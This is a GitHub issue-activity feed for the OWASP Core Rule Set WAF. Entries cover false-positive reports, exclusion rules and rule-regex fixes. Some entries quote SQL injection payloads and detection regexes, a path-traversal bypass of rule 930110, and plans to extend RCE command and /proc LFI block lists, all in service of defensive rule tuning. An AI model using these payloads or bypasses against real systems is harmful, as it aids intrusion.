Are the above links the ones to look for refere

[2021-06-05 07:41] #2114 closed

[2021-06-05 11:36] fzipi commented on #2114
I'm glad it worked!

The above links are excellent as reference 🙂

[2021-06-07 08:31] ElDavoo opened #2117 "FPs with Cloudflare proxy and paranoia 4"
### Description

Proxying the website with Cloudflare on paranoia level 4 create some FPs.
1) The header CF-Visitor: {"scheme":"https"} is appended and gets FP because of the {}.
2) Some cookie stuff I didn't actually understand

Note that this is paranoia level 4 so it's kind of normal to have these FPs. Still, it would be useful to handle this headers better or to exclude them completely (?)

##

[2021-06-07 08:51] NiceYouKnow opened #2118 "942310 regular suspected error"
### Describe the bug
There may be a problem with [\\"'\`]\s+and\s*?=\W in the 942310 rule. You can view this part in the /util/regexp-assemble/regexp-942310.data file. By analyzing the regularity, There can only be` \s` between [\\"'\`] and `and`, and `\w `cannot be after and, such as `" and =;`, but I check related payloads such as: `AND 1=1 AND '%'='
 ` Unable to be hit, more related payloads ca

[2021-06-07 10:02] franbuehler commented on #2118
Hi again @NiceYouKnow :wave:

Thanks again for your very welcome issue!
We'll investigate it shortly.

[2021-06-07 11:25] franbuehler commented on #2117
Thank you for reporting this issue.
We'll investigate this shortly.

[2021-06-07 11:55] NiceYouKnow opened #2119 "942380 regular suspected error"
### Describe the bug
There may be a problem with the `exists` part of the 942380 rule. You can check the exists-related regularity in the `/util/regexp-assemble/regexp-942380.data` file:
`exists\s\sselect`
`exists\sselect\Sif\s\(`
`exists\sselect\Sifnull\s\(`
`exists\sselect\Stop`
`exists\sselect\Sconcat`
`exists\ssystem\s\(`
`exists\s\b(?i:having)\b\s+\d{1,10}`
`exists\s'[^=]{1,10}'`
 `(` is not

[2021-06-07 12:27] airween commented on #2069
#2098 is closed - do we need to keep this issue open?

[2021-06-07 12:51] franbuehler commented on #2119
Also here: I self-assigned this issue here too.

[2021-06-07 13:21] fzipi commented on #2117
Hi @ElDavoo ! After taking a look, both are correct matches for PL4 from what I can see.

1) `CF-Visitor` header is basically JSON. Looking [here](https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-CloudFlare-handle-HTTP-Request-headers-#GWHV3S5H6MRJZNK28EYZ), it might be a setting in CF.

2) `cf_clearance` cookie. Clearance Cookie that stores the proof of challenge passed. It is

[2021-06-07 13:27] ElDavoo commented on #2117
You're right, since many CDNs add their stuff to the origin web servers, it is wise to create a larger "support CDNs headers" project, not limiting only to cloudflare.

[2021-06-07 14:02] franbuehler commented on #2119
Yes, you're right. These exists statements you listed above don't make sense because `exists` has to be followed by a `(`.
At least for Microsoft. I'm not sure about the others.

Do we want to extend them all with an optional `(` after exists? And maybe also allow whitespaces before and after it?

Example :
`exists\s*?\(?\s*?select\Sif\s\(`

What do you think?

Also this one here, does it make sen

[2021-06-07 14:20] NiceYouKnow commented on #2119
Yes, your idea is great. But if `(`can not appear, it may hit the wonderful payload `existsselect=if (`. And I also found that the `\S` after `select` is also very strange. So it is better not to modify the old rules and add a new regular `exists\s*?\(\s*?select\b` to solve.
What do you think?
I think two \s are meaningless.

[2021-06-07 14:51] franbuehler commented on #2119
Yes, those strange existing regexes are an argument against extending them.
I like a new, additional regex.
Ah, and the word boundary after select is a great, maybe even before exists?
`\bexists\s*?\(\s*?select\b`

Would you like to open a PR again? ;-)
Please let me know if I shall open one?

[2021-06-07 14:57] NiceYouKnow commented on #2119
Ok, I will open a PR again. Thank you for your approval! ;-)
Add a new rule：
`\bexists\s*?\(\s*?select\b`

[2021-06-07 15:22] franbuehler commented on #2118
I searched all source files for `and`.

The regexes that contain `and` and detect `AND 1=1 AND '%'=' are`:

regexp-942400.data:\band\b\s+\d{1,10}\s*?[=<>]
regexp-942400.data:\band\b\s+'[^=]{1,10}'\s*?[=<>]
regexp-942400.data:\band\b\s+\d{1,10}
regexp-942400.data:\band\b\s+'[^=]{1,10}'
regexp-942400.data:\band\b ?\d{1,10} ?[=<>]+
regexp-942400.data:\band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+

Rule 9424

[2021-06-07 18:29] dune73 commented on #1905
Any news on this front?

[2021-06-07 18:44] franbuehler commented on #2074
# Decisions

## PRs

* #2068: Add rule-ctl.py script
* #2070: Detect JavaScript prototype pollution injection attempts
* #2072: Remove statement that is confusing in this context
* #2078: Adding word boundary to lower FPs
* #2094: Improve sampling efficiency2
* #2101: Fix FP 953120 brotli compression
* #2106: Little performance fixies
* #2107: Use chained end tag detection for rule 941310*
* #2112

[2021-06-07 23:28] Schroeffu commented on #2108
Hi @airween , today i was getting confused because i couldn't reproduce the #Upload failed Part #2 issue, so here is the header log from 10 days ago initially the issue happened:

`--460e2719-A--
[28/May/2021:23:54:15 +0200] YLFmg5iURb3zH47gxybUpAAAABM 31.18.248.40 10700 75.119.159.75 443
--460e2719-B--
POST /seafhttp/upload-aj/8edf184d-22e8-46a5-9ecc-5fd90f132cd8?ret-json=1 HTTP/2.0
User-Agent: M

[2021-06-08 00:08] Schroeffu commented on #2108
just got another fp, the upload via Seafile desktop app seems not adding any Content-Type (i guess because seafile is running by block storage technology)

[code]

Disarmed via:

[code]

[2021-06-08 01:18] NiceYouKnow commented on #2118
`AND 1=1 AND'%'='` is just an example. What I want to express is that

 may have a problem, and I cannot understand the payload it can hit.

[2021-06-08 18:01] dune73 commented on #2117
PL4 is usually throwing a ton of FPs and that's kind of anticipated. Naturally, the FPs are different for every context such as CDN or application used. If we were to anticipate FPs at PL4(via rule exclusions and chains on the existing rules), it would blow up the rule set and cause a substantial performance problem for everybody. Also for users not using PL4.

So I think we have to close this iss

[2021-06-08 20:29] ElDavoo commented on #2117
ok! I kinda expected that, but still wanted to document this specific issue on github.
Thank you for your huge work, you're amazing! :)

[2021-06-08 20:29] #2117 closed

[2021-06-08 20:56] airween commented on #2108
Hi @Schroeffu,

thanks for the details.

If I'm right, for your first comment today you don't need any help.

For the second issue: looks like you handle the issues perfectly, but let me clear the situation above. The firs line shows the rule [920340](https://github.com/coreruleset/coreruleset/blob/v3.3/master/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf#L687-L705) does not have any disruptive acti

[2021-06-09 08:22] dune73 commented on #2117
Correct. It's good to have it on github and an idea could be to list known FPs at higher PLs. Or we think about rule exclusions as plugins for the future.

Thank you for your understanding and the compliment. It's users like you that making working on CRS such a fun experience.
And please stay around, also on our slack.

[2021-06-09 10:13] edwinvandeburgt opened #2123 "False Positive 932100 (Unix command injection) for OData-queries"
Rule 932100 is triggered for OData queries that contain an $expand keyword.

URL-fragment (table and column names replaced):

.../table?$select=a,b,c,&$expand=c($select=d,e,f;$expand=g($select=h),i($select=j)),k($select=l,m)&$filter=n/o%20eq%20'10091595'%20and%20p/q%20eq%200%20and%20r/s%20eq%200%20and%20t%20eq%200

Both the "&$expand" and ";$expand" are matched by the 932100 regex.

[2021-06-09 13:11] fzipi commented on #2123
@edwinvandeburgt Thanks for the report, we are going to review it soon!

[2021-06-09 13:12] fzipi commented on #2123
For the sake of documentation for other devs, OData comes from https://www.odata.org/

[2021-06-09 13:32] fzipi commented on #2123
@edwinvandeburgt Can you add CRS version and other relevant information here (web server, modsec version, etc.)?

[2021-06-09 14:09] dune73 commented on #2123
This is a query submitted as a query string. Correct?

If yes, is this really a false positive or rather a architecture weakness that was used for benign purposes in this particular situation?

[2021-06-09 14:11] fzipi360 commented on #2123
Well, it is probably a false positive. We include the `expand` unix command in our list, and that is being catched.

[2021-06-09 14:12] fzipi commented on #2123
Well, it is probably a false positive. We include the expand unix command in our list, and that is being catched.

[2021-06-09 14:19] dune73 commented on #2123
Yes, sure. The rule is not aimed at odata. But - with a bit of distance - if some kind of software would send SQL queries in query strings, we would consider it a legitimate alert.

That does not rule out the option to create a odata rule exclusion package - volunteers welcome - yet I think it would be wrong to tune down the unix command rules because it odata happens to use some of the keywords i

[2021-06-09 20:20] edwinvandeburgt commented on #2123
Here are some more details. We are running a WAF op Microsoft Azure Application Gateway:

ruleSetType_s | OWASP_CRS
ruleSetVersion_s | 3.1.0
ruleId_s | 932100
action_s | Matched
details_message_s | Warning. Pattern match [...] at ARGS:$expand ....
details_data_s | Matched Data: ;$expand found within ARGS:$expand: [...]
details_file_s | rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
details_line_s |

[2021-06-09 20:33] fzipi commented on #2123
Amazing, that's a lot of information that helps us identifying the problems.

The good thing is that the regexp is generated based on [this source file](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/util/regexp-assemble/regexp-932100.txt). So that you can check. The problem is clear there.

[2021-06-09 22:53] Schroeffu commented on #2108
Thank you for all the explanations,  I think I got it why to increase SecRequestBodyNoFilesLimit in this case, as you explained.

I think we can close this issue. Currently my Seafile is working as expected with all the adjustments discussed here :-)

thanks again!

[2021-06-09 23:04] #2108 closed

[2021-06-10 07:36] edwinvandeburgt commented on #2123
@fzipi, @dune73 I have only very limited experience with unix, but what if it still triggers on "expand" but not on "$expand" ?

[2021-06-10 08:32] abudawud opened #2125 "Grafana: query range treated as SQLi using libinjection"
### Description

I plan to implement WAF using ModSec + CRS, but until now i still run in DetectionOnly mode to make sure my normal production traffic is fine and make sure there is no false positive detection. During i running modsec in DetectionOnly i got many false positive detection and fix it by customizing crs-setup.conf to reduce false positive detection, except this false positive detectio

[2021-06-10 13:33] fzipi commented on #2123
You can read the comments on the rule itself.

[code]

[2021-06-10 13:40] fzipi commented on #2125
Hi @abudawud ! Thanks for your report.

You can get the request by audit logging the `C` part (see [here](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-%28v2.x%29#secauditlogparts))

From what I see, the request triggers `libinjection`. Which might be difficult to tackle, because the library isn't receiving too much maintenance right now.

If you really want to solve the FP probl

[2021-06-11 00:41] abudawud commented on #2125
sorry, i'm noob with `libinjection`, my question is who use the lib, Grafana or ModSec itself ?

Would you like to give me some reference how to exclude this ?

[2021-06-11 07:28] dune73 commented on #2125
Libinjection is a 3rd party library ModSecurity / CRS uses and we have no influence over it. If there is a false positive in libinjection, there is nothing we can do.

So you need to create a rule exclusion for your particular case. https://www.netnea.com/cms/apache-tutorial-8_handling-false-positives-modsecurity-core-rule-set/ explains how to do this.

[2021-06-11 07:46] abudawud opened #2126 "9003100 exclusion not working on owncloud 10.6.0"
### Description

I'm using owncloud 10.6.0 server and it's use `/remote.php/dav/files/...` to upload files using `PUT` method. I'm already set `tx.crs_exclusions_nextcloud=1` and it's already working except this one until i modified rule [9003100](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf#L68).

If this issue is valid, i will cre

[2021-06-11 07:47] abudawud commented on #2125
Thanks @dune73, i got the point now.

[2021-06-11 07:47] #2125 closed

[2021-06-11 07:50] dune73 commented on #2125
Thank you for closing

[2021-06-11 07:51] dune73 commented on #2126
Sorry for the inconvenience and thank you for reporting.

We have a pull request for Nextcloud / Owncloud to cover addition false positives with said rule exclusion package.

Could you check if your FP is covered here? https://github.com/coreruleset/coreruleset/pull/1975

[2021-06-11 08:29] abudawud commented on #2126
Thanks for your response.

I'm already check #1975 and it's not covered at there.

I don't know why my oc using `/remote.php/dav/` instead of `/remote.php/webdav/` to upload files. That's why i need to modify rule 9003100 which it's not covered in #1975

[2021-06-11 08:46] abudawud commented on #2126
hey i found a [related discussion](https://github.com/owncloud/core/issues/23762) about a confusion with `dav` and `webdav`. And i think rule 9003100 should match both dav and webdav

[2021-06-11 14:12] franbuehler commented on #2118
Ok, I misunderstood your problem. 😀

I also don't know which payload was meant here with this regex:
`["'`]\s+and\s*?=\W`

Some examples that probably don't make sense 😉  But so we can understand the pattern:
https://regex101.com/r/olcs1Q/1

Maybe someone with SQLi knowhow can help us?
@theMiddleBlue can you help us here?

[2021-06-11 14:21] edwinvandeburgt commented on #2123
I see :-) I should have read the sources. Nicely documented by the way!

[2021-06-11 14:25] dune73 commented on #2123
Thank you. Much appreciated.

[2021-06-11 15:20] fzipi opened #2127 "Add exclusion set for OData standard"
### Motivation

[OData (Open Data Protocol)](https://www.odata.org/) is an ISO/IEC approved, OASIS standard that defines a set of best practices for building and consuming RESTful APIs. Its usage of common wording, similar to SQL is probably going to be something to consider in next versions.

This is a proposal to add some exclusion set that allows our users to use OData in a controlled environme

[2021-06-11 15:23] fzipi opened #2128 "Extend util/regexp-assemble/regexp-93210X.txt with additional unix commands"
### Motivation

After reviewing the issue #2123, there are plenty of unix commands not covered in our list. Examples are `perl` (raku), modern `ruby` (irb > 2.3), more shells, etc.

### Proposed solution

Extend the list with additional commands that might be useful for attackers to use as rce.

[2021-06-11 15:24] fzipi commented on #2123
Thanks all for your comments.

The action that will be taken from this one is then:

- create a new issue for adding a set of exclusions for OData queries (#2127)
- update the unix rce commands list (#2128)

Closing this one.

[2021-06-11 15:24] #2123 closed

[2021-06-11 17:56] fzipi commented on #2081
PR was merged, closing.

[2021-06-11 17:56] #2081 closed

[2021-06-12 13:55] #2126 closed

[2021-06-19 07:48] yupthatguy opened #2133 "GitLab Behind ISPConfig Proxy, Behind ModSec"
### Description
I am currently configuring behind an ISPConfig control panel with ModSec running server wide on my virtualbox development server.  I created a separate root folder for GITLAB via the ISPConfig GUI (and configured the proxy settings as well).  Additionally, I configured my GitLab   `/etc/gitlab/gitlab.rb` as necessary to make GitLab work with Apache (ISPConfig creates the vhost).

I

[2021-06-19 11:49] fzipi commented on #2133
@yupthatguy From what I read there, looks like all requests are coming from `127.0.0.1` initially.

If you know the IPs from where you are going to consume Gitlab resources, you can use just the first rule you added with the IP exclusion:

`SecRule REMOTE_ADDR "^XXX\.XXX\.X\.XX" "id:1005,phase:1,allow,ctl:ruleEngine=off"`

You might want to add also something for the `127.0.0.1` also, but then be

[2021-06-20 11:16] yupthatguy commented on #2133
Thanks for the speedy reply, this has been a bottleneck for me.

I hashed the above line out and tried to deactivate via the vhost using,

`<IfModule mod_security.c>
SecFilterEngine Off
</IfModule>`

But this had no effect... the errors related 127.0.0.1 remain.  Effectively, I am unable to whitelist my IP and I am unable to deactivate modsecurity for the directory.

Can you provide a specific exc

[2021-06-20 12:08] fzipi commented on #2133
The most comprehensive tutorials are the ones from https://www.netnea.com/cms/apache-tutorials/.

It doesn't *need* to be a remote address, it just has the remote IP of the client connecting. As you can see in the log lines, the ones that start with `--< 8 numbers and letters > -A--` (that's the start of the log line for modsecurity), all connections are coming from 127.0.0.1 from ports > 1024, an

[2021-06-20 16:47] yupthatguy commented on #2133
Again, thanks for the speedy feedback.  And I will be taking a deep dive on the tutorials in the very near future.

- I correctly disabled modsec via the vhost.
- I correctly whitelisted my development IP

My bottleneck are the modsec errors be generated via 127.0.0.1 traffic.

And, I have already tried to whitelist 127.0.0.1 using:

`SecRule REMOTE_ADDR "^XXX\.XXX\.X\.XX" "id:1005,phase:1,allow,c

[2021-06-20 20:08] dune73 commented on #2133
Hi @yupthatguy, that's really odd. And I am troubled to see a 400. 400s are usually not linked to ModSec, but who knows.

What strikes me is your use of "allow". We usually do "pass" and I have a faint feeling that allow might play into this odd behaviour. I never use it myself. :)

Then your address match should work, but the use of the ipMatch operator would be cleaner.

Other than that, I sugge

[2021-06-21 09:09] dune73 commented on #2128
Great idea.

[2021-06-21 10:01] dune73 commented on #2071
I'm losing the overview here a bit. Can you guys tell me what the status is?

[2021-06-21 10:02] #2069 closed

[2021-06-21 10:04] dune73 commented on #2066
Thank you @petskratt. I think this is all we need here. I'm removing the *need more info* label.

Do you think you could a PR for this to blend in with the existing WordPress rule exclusions?

If it's too much of a hassle, we'll look for somebody from the dev team.

[2021-06-21 10:06] dune73 commented on #2064
Closing this in favor of #2101.

[2021-06-21 10:06] #2064 closed

[2021-06-21 10:09] #2060 closed

[2021-06-21 11:49] dune73 commented on #2105
Just for the record.

[code]

[2021-06-21 12:33] dune73 commented on #2093
Have not heard from the reporter anymore with *need more infos* for over a month. Closing this.

If infos become available, then please re-open.

[2021-06-21 12:33] #2093 closed

[2021-06-21 12:49] dune73 commented on #2091
Closing this in favor of #2094. Thank you @53cur3M3 for taking good care of this and then some more.

[2021-06-21 12:49] #2091 closed

[2021-06-21 13:25] dune73 commented on #1991
Thank you

[2021-06-21 19:30] lifeforms commented on #2109
Decision: It only affects PL2 so we assume that the administrator can write exclusion rules. I will write a short blog post on excluding Matomo cookies specifically.

[2021-06-21 19:42] lifeforms commented on #2095
I will add this to the WordPress exclusions package.

[2021-06-21 19:50] lifeforms commented on #2071
Meeting decision: I will help the submitter by making the necessary changes myself.

[2021-06-22 05:12] theseion commented on #2109
Format of the referrer attribution cookie (*_pk_ref*): https://github.com/matomo-org/matomo/blob/9696ebf41083f246357bdb0db605f00520866542/js/piwik.js#L3652.

[code]

Our rules only match this when *both* *campaignNameDetected* and *campaignKeywordDetected* are empty.

[2021-06-22 05:16] theseion commented on #2109
So since this is a simple JSON array, we *could* add chained rules to reject FP's in JSON. I'm not sure what the best way here is. Maybe we could pipe the cookie data through a JSON parser to check if it's valid JSON and then ignore it...?

[2021-06-22 07:33] aus-coder opened #2134 "PHPMyAdmin exclusion rules"
Exclusion rules defined for PHPMyAdmin in `REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf ` files are for 4.x branch of PHPMyAdmin but in latest 5.x branch URLs are in different format.

For example for SQL query page the URL is `/index.php?route=/server/sql`

All URLs in this version use routes instead of static page names.

Is there a plan to upgrade the exclusion file? Or is there one already

[2021-06-22 07:36] azurit commented on #2134
Hi @aus-coder, we are already working on this!

[2021-06-22 07:37] aus-coder commented on #2134
Great, thank you! I wasn't aware of this, so reported it after encountering the problem today.

[2021-06-22 08:16] dune73 commented on #2109
Here is a payload:

[code]

This triggers the following alerts:

[code]

However, I can not get 932200 to trigger, despite playing around with the alert messages above.

[2021-06-22 08:20] dune73 commented on #2109
Workarounds / avoiding FPs: We want to avoid triggering on `^["","",`, however due to the execution order of ModSec rules, we can not chain and then inspect `MATCHED_VAR_NAME` or even look into the match, since it might have been overwritten the moment we reach the chained rule. So I really think we would have to enhance the basic regex and make sure it does not trigger on the pattern I just menti

[2021-06-22 08:57] dune73 commented on #2117
We talked this through at the project chat last night again and we concluded, we won't be change the rules to avoid this FP, however we would welcome a cloudflare rule exclusion package. If anybody would start to write one.

[2021-06-22 09:34] franbuehler opened #2135 "False Positive with word Ping in 932115"
### Description

### Audit Logs / Triggered Rule Numbers

False Positive with `\nPing Pong` and `&Ping Pong` in RCE rule 932115.

[code]

https://regex101.com/r/YJwfiJ/1

### Your Environment

* CRS version (e.g., v3.2.0): 3.3.0
* Paranoia level setting: 1
* ModSecurity version (e.g., 2.9.3): 2.9.3

### Confirmation

[x] I have removed any personal data (email addresses, IP addresses,
    password

[2021-06-22 11:08] theseion commented on #2109
Yes.

Also yes.

Looking at the regex for 932200 (https://regex101.com/r/JgZFRi/7), that rule could probably match *campaignKeywordDetected* or *campaignNameDetected*. It is more likely to match the URL part though. I checked the source and the URL values that we see in the examples here are very likely overrides (the referrer URL can be overridden). That's why they have wild cards. Usually the UR

[2021-06-22 11:24] theseion commented on #2109
Here's a rough idea:
1. split the rules in two, with one rule only handling cookies, the other handling the rest
2. for the cookie rule
  1. try to find a match (e.g. SQLi)
  2. in a chained rule run the cookie through a regex that tries to match valid json (which, arguably, is a separate problem)
  3. if the json is valid do nothing otherwise run the chain starter actions.

The reason I'm proposi

[2021-06-23 07:11] dune73 commented on #2134
Thank you for reporting @aus-coder. We hope to deliver the update soon. Closing this in the meantime.

[2021-06-23 07:11] #2134 closed

[2021-06-23 08:08] dune73 commented on #2128
Closing this in favor of PR #2129. Thanks for raising and covering this @fzipi.

[2021-06-23 08:08] #2128 closed

[2021-06-23 08:25] dune73 commented on #2127
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: @theseion takes this on and @fzipi promises to coach him.

[2021-06-23 08:39] dune73 commented on #2109
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: @lifeforms will do a blog post how he usually handles this problem and as can be seen above, @theseion is actively continuing the conversation.

[2021-06-23 08:42] dune73 commented on #2105
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

We think the semicolon is a very old CVE that does not really concern us that much and we don't really see who the dot can pose a problem, also since it's being normalized away in CRS via the path normalization transformations.

So we are closing this issue.

[2021-06-23 08:42] #2105 closed

[2021-06-23 08:43] dune73 commented on #2095
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: @lifeforms will take this on and do the fix. As an addendum, we are OK with covering WP plugins in Rule Exclusion packages.

[2021-06-23 08:44] dune73 commented on #2083
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: @53cur3M3 will address this in a new PR, since the existing PR 2084 is too botched. Leaving this open until the new PR appears.

[2021-06-23 08:45] dune73 commented on #2071
For the record: We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

[2021-06-23 08:45] dune73 commented on #2062
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: @fzipi volunteered to fix this for good.

[2021-06-23 08:46] dune73 commented on #2044
We talked about this issue at our [recent project meeting](https://github.com/coreruleset/coreruleset/issues/2074#issuecomment-856173925).

Decision: We have not heard from @flo405 anymore, so it's likely we have to start over from scratch ourselves. @franbuehler and @lifeforms agreed to take this on.

[2021-06-23 08:46] #2074 closed

[2021-06-23 14:52] dune73 commented on #2083
Closing this in favor of PR at #2137.

[2021-06-23 14:52] #2083 closed

[2021-06-23 19:11] theseion commented on #2127
I read through some of the OData documentation. From what I understand we will have to come up with an exclusion package that disables all those rules (mainly SQLi and RCE I suppose) that trigger false positives. For that we will need a comprehensive suite of tests that can generate the FP's. Is that what you had in mind?

I guess we can start by focusing on the specification and create tests that

[2021-06-23 19:29] noneisland commented on #2044
I'm willing to help.

But I am not sure how to build and test the changes.

Instructions on how to build the changes from scratch will help.

[2021-06-23 19:35] fzipi commented on #2127
GraphQL and others are coming, for sure.

We can use the OData test service in https://services.odata.org/ and see what we get. Probably proxying it with modsec will give us an initial subset.

From RCE, we only had one particular match, but taking a look there won't hurt.

[2021-06-23 19:37] fzipi commented on #2127
Looks like also https://pragmatiqa.com/xodata/ is using that site for tests.

[2021-06-23 19:42] dune73 commented on #2127
@theseion : We are usually not as systematic as you propose. It's more of an empiric approach. Like putting CRS in front of an installation and logging the FPs, doing the REs and then repeat until no more FPs.

Ideally it's a group of people that use a software and we kind of wished the communities behind these softwares would join / support us with coming up with RE packages, but that never happe

[2021-06-23 19:46] dune73 commented on #2044
Thank you @noneisland. You'll hear from @franbuehler or @lifeforms soon.

[2021-06-24 08:20] yupthatguy commented on #2133
Ok what finally got rid of the modsec 400 errors and properly whitelisted my development IP and 127.0.0.1 is

##This is to whitelist my development ip for Gitlab, but reject everyone else's and turn off modsecurity for me.
SecRule REMOTE_ADDR "^XXX\.XXX\.X\.XX" "id:1005,phase:1,allow,ctl:ruleEngine=off,chain"
SecRule REQUEST_HEADERS:Host "@streq dev.example.com" "t:none"

#This whitelists 127.0.0.

[2021-06-24 08:39] dune73 commented on #2133
That's indeed a bit odd, but glad it's working now.

If you think this is solved, then please close the issue or tell us, what else you need.

[2021-06-24 08:42] #2133 closed

[2021-06-24 15:32] willyamcts opened #2139 "LogPart E (ctl:auditLogParts=+E) being added without matching as a rule"
### Describe the bug
Rule id 954130 applies auditlog change (ctl:auditLogParts=+E), adding response body to log. Regardless of whether there is a match in the rule or not, the E block is added to all logs. I found the log in debug mode in line ***:
[code]

My "SecAuditLogParts": ` SecAuditLogParts AB `

In the records of auditlog has only match of my simple rule just to generate log. No match with

[2021-06-24 19:28] franbuehler commented on #2139
Hi @willyamcts,

Thank you for your report.

I think the problem here is that the ctl action is in the first rule, not the second of the chain. This means that the ctl action is executed when the first rule matches and not only when the whole chain matches.

But I don't see where the problem is because nothing is logged when the whole chain does not match. So LogPart E is never logged either.

Nev

[2021-06-25 02:55] donky16 opened #2140 "Rule id 930110 Bypass"
### Description
Because of the conversion of cmdLine function, ..\ will not be intercepted.
poc
![image](https://user-images.githubusercontent.com/24637333/123362812-d67f8900-d5a3-11eb-858b-506a39faabd1.png)

### Environment

* CRS version: v3.4/dev
* Paranoia level: 1
* Web Server and version: apache 2.4.29
* Operating System and version: Ubuntu 18.04

[2021-06-25 06:46] dune73 commented on #2140
Hey @donky16, thank you for reporting. I confirm this is not caught in our default installation (in fact it's only caught at PL4).

However, I am not sure this can be considered an attack. If I set a to `..\etc\passwd` we detect it just fine. So it boils down to the question whether CRS should block access to for a parameter with a value `secret` that might point to a file - or not.

[2021-06-25 06:56] dune73 opened #2141 "Monthly Chat Agenda July (2021-07-05 and 2021-07-19)"
This is the Agenda for the Monthly CRS Chat.

The general chat is going to happen on https://owasp.slack.com in the channel #coreruleset on Monday, 2021-07-05, at 20:30 CET. That's the 1st Monday of the month. A separate issue chat is happening at the same location, same time on Monday, 2021-07-19. That's the 3rd Monday of the month. Please note that we have a [CRS calendar](https://calendar.googl

[2021-06-25 15:59] willyamcts commented on #2139
Hi @franbuehler , thanks for attention.

Really moving ctl for chain rule solved.

strange is to apply only the ctl logpart, nothing else is executed. In my see it should not perform any action if there is no match in both rules, for some reason it ran ctl logpart without respecting this condition (AND).

At disposal, see you later.

[2021-06-26 18:04] donky16 commented on #2140
..\..\secret will be caught, but ..\secret not. I think this is a contradiction. And whatever the secret is, ..\secret should be considered as a path travel attack. That's why rule 930110 exists.

[2021-06-28 07:36] dune73 commented on #2140
Thank you. We looked too much at `secret` and not enough at `..\`. So it's in fact `..\<anything>` that should be detected as attack. That is a worthwhile complaint.

[2021-06-28 14:23] #2110 closed

[2021-06-29 11:27] fancsali opened #2142 "WordPress /wp-admin/site-health.php triggers"
### Description

Trying to open `/wp-admin/site-health.php` triggers a `403` despite being a legit request; despite the WP exception rules being enabled in `/etc/modsecurity/crs/crs-setup.conf`:

[code]

### Audit Logs / Triggered Rule Numbers

[code]

### Your Environment

* CRS version (e.g., v3.2.0): v3.3.0
* Paranoia level setting: default
* ModSecurity version (e.g., 2.9.3): v2.9.3
* Web Serv

[2021-06-29 11:48] azurit commented on #2142
Hi @fancsali!

Thank you for reporting this. Can you attach the output of such request if it isn't blocked?

[2021-06-29 12:03] lifeforms commented on #2142
I have actually just had a similar problem with a customer. The output of their Site Health page included `session_start()` which triggered a PHP leakage rule.

Depending on the plugins used, this page may echo various "suspicious" strings about your PHP and database setup. I think it is quite safe to exclude this in our package, as the explicit purpose of the Site Health page is to report details

[2021-06-30 21:15] skwokie opened #2145 "Rule 942100 is still triggered after setting ruleRemoveById"
### Describe the bug
Hi, rule 942100 is triggered with audit log:
[code]
I've tried to exclude it by creating this exclusion rule in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf; however, 942100 is still being triggered.
[code]

### Expected behaviour
I expect 942100 not to be triggered with the exclusion rule for the particular uri.

### Additional context
As suggested by someone on serverfault.co

[2021-06-30 21:22] dune73 commented on #2145
The alert message that you posted contains the URI without the query string. The variable REQUEST_URI contains the URI including the query string and then you continue with the streq operator. In rule exclusions, I usually use the beginsWith operator.

Other than that, this looks good to me.

[2021-06-30 21:38] skwokie commented on #2145
Hi, thanks so much for your prompt response. Just to make sure I understand correctly, you are saying that although my exclusion rule's URI matches the one in the audit log, the call actually has query string and so I need to use beginsWith instead. Thanks.

[2021-07-01 06:24] dune73 commented on #2145
Yes, exactly.

It is not obvious the audit log URI is stripped down, it's just ModSec trying to make you miserable.

beginsWith should do the job, if not, then please provide the original request and I can run a quick test.

[2021-07-02 07:37] dune73 opened #2146 "Add two User Agents to crawler file"
### Description

The following two user agents should be detected as crawlers:

[code]

### Your Environment

* CRS version (e.g., v3.2.0): v3.4
* Paranoia level setting: -
* ModSecurity version (e.g., 2.9.3): -
* Web Server and version (e.g., apache 2.4.41): -
* Operating System and version: -

### Confirmation

[X] I have removed any personal data (email addresses, IP addresses,
    passwords, d

[2021-07-02 07:40] dune73 opened #2147 "Addressing requests to /proc and /sys"
### Description

We do not really cover requests to `/proc` as LFI attempts. I am not sure the whole tree can be blocked, but it has to be assessed what can be done about it.

### Your Environment

irrelevant

### Confirmation

[X] I have removed any personal data (email addresses, IP addresses,
    passwords, domain names) from any logs posted.

[2021-07-02 08:07] lifeforms commented on #2147
I think blocking `/proc` might cause too much FP in text like `/procedures` but we should do a thorough listing of our `/proc` filesystems to block as much as possible.

Note that we have already some proc entries in `lfi-os-files.data`. We have also `restricted-files.data`. I think the proc entries should be added to both (so they are blocked as REQUEST_FILENAME but also as form parameters).

I t

[2021-07-02 08:26] airween commented on #2147
On Debian 11 I've found these additions:

[code]

RH 8.2 additions:
[code]
Sles 15 contains mixed of items above.

[2021-07-02 12:04] #2113 closed

[2021-07-02 12:16] #2119 closed

[2021-07-05 08:12] franbuehler commented on #2118
Hi @theMiddleBlue

Do you know what payload should be detected with `[\"'`]\s+and\s*?=\W` in rule 942310 (https://github.com/coreruleset/coreruleset/blob/v3.4/dev/util/regexp-assemble/regexp-942310.data#L1) and if this makes sense or if we have a problem with this regex?

I tried to write some examples which probably don't make sense:
https://regex101.com/r/olcs1Q/1

Could you please help us here?

[2021-07-05 19:11] franbuehler commented on #2141
# Decisions

## PRs

* https://github.com/coreruleset/plugin-registry/pull/3
* #2014: Move 941310 from PL1 to PL2 -- @franbuehler proposes to abandon this
* #2052: 932200 Linux RCE evasion with (more) uninitialized bash parameters
* #2068: Add rule-ctl.py script
* #2078: Adding word boundary to lower FPs
* #2101: Fix FP 953120 brotli compression
* #2107: Use chained end tag detection for rule 9413

